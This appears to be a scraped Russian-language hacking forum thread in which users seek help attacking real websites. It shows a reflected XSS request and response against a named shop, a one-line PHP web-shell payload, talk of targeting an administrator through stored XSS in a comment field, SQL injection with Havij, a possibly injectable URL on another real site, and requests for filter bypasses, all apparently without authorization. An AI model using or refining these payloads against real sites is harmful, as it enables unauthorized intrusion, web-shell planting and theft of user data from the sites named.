Code: GET /captcha/?route=captcha"><script>prompt(947944)</script> HTTP/1.1 Host: ssh-shop.in Code: HTTP/1.1 200 OK ... <a href="/index/language?set=en&location=/captcha/?route=captcha"><script>prompt(947944)</script>"><img src="/img/us.png" border="0" align="absmiddle" /></a> <a href="/index/language?set=ru&location=/captcha/?route=captcha"><script>prompt(947944)</script>"><img src="/img/ru.png" border="0" align="absmiddle" /></a>
Ребят) вопрос такой вообщем есть фича на сайте типо добления в blacklist мембера например который тебе не приятен) суть не в этом) Когда добовляешь мембера в блэк вылазит поле для ввода коментария ( ну мол потом когда заходишь на его страницу виден этот коментарий только тебе ) Суть вопроса в том, вообщем я заметил что в это поле отлично вставляется html код и он работает .) Есть ли возможность что то придумать через html ... Сорри за идиотский вопрос 200 лет уже не занимался ничем подобным)) все позабыл)
Возможно, но думаю что врятли ибо если представить что например этого пользователя добавило в блэк хотя бы 100-200 человек, тогда админ зайдет на его страницу, он устанет читать различную по3б3нь возле его ника в профиле))
через XSS можно сделать многое, вплоть до автоматической заливки шелла: http://forum.antichat.ru/threads/50646/#post-584229 отлови http пакет во время добавления юзера в блек и инжектируй туда свой evil код
Админа пригласить на страницу проблемы нет никакой) проблема у меня в том что в xss у меня нет как токовых знаний и практики) yarbabin, подсказал запилить <script>alert()</script> Вообщем вписал, никаких изменений не было) В профиле получается написан ник пользователя например ATMOSFERA (тут в скобочках отображается причина) В моем случае просто получились простые скобочки) Сорян что пишу куйню эту всю) но в xss вообще нет никаких познаний) Пните меня в нужное русло с подсказками) может какой еще код попробовать внедрить) Пробовал <?php eval($_REQUEST[c]); ?> запилить и вызвать http://site.ru/member.html?id=12547&c=phpinfo(); Не получилось)) куйню наверно делаю))
Через havij раскрутил скулю, в итоге нашлась одна база "information_schema" как не пытался найти данные пользователей, бесполезно, где могут хранится данные? сорри за нюбский вопрос, заранее благодарен за помощь.
information_schema - системная база с системными таблицами, в ней нет юзеров. Основная база сайта - другая. И не факт что там будут данные пользователей.
Ребятки такой вопрос. Возможно ли отослать письмо на маил почту @mail.ru с hml так что бы при получении его, получатель открыл и отработал JS. Но имеено при открывании его.
Вообщем вернусь опять к вам за помощью по данному вопросу. Суть такова, xss то. а толку от нее никакого. Т.к. Админ при заходе на страницу пользователя которого я добавил в блэк не видит коментарий который я написал при добавлении этого пользователя к себе в блэк. Собственно, xss не вариант, т.к. работать она будет только с моего аккаунта. При добавлении кометария вида <? phpinfo(); ?>, php-инфо конешно же не выводится( но посмотрев исходный код страницы я обнаружил что код добавлися в таком виде <!--? phpinfo(); ?--> Подскажи что еще можно попробовать) Заранее очень благодарен...)
Чучуть поподробнее пжлст) или хотя ткните носом в пруф где описано как это делается... А то читать все..и практиковать уйдет куча времени... которого и так впринципе то нет( Индивидуальный, самописанный)) Точнее сказал бы пару лет назад писали одни, а фичу с добавлением коментариев уже не так давно дописал другой) Заранее всем благодарен за помощь.
PHP: http://www.matrasmax.ru/konfigurator/?on_page=15&price_active=0&height_active=0&type=&size=131&producer_46=on&producers=&price_from=0&price_to=12000&materials=&stronger1=ТУТ &stronger2=&text=&action=apply_filter Инъекция?
Ребята, так понимаю там стоит какой то чудо фильтр на <? ... Мб есть у кого варианты как можно попробовать обойти данный фильтр?)
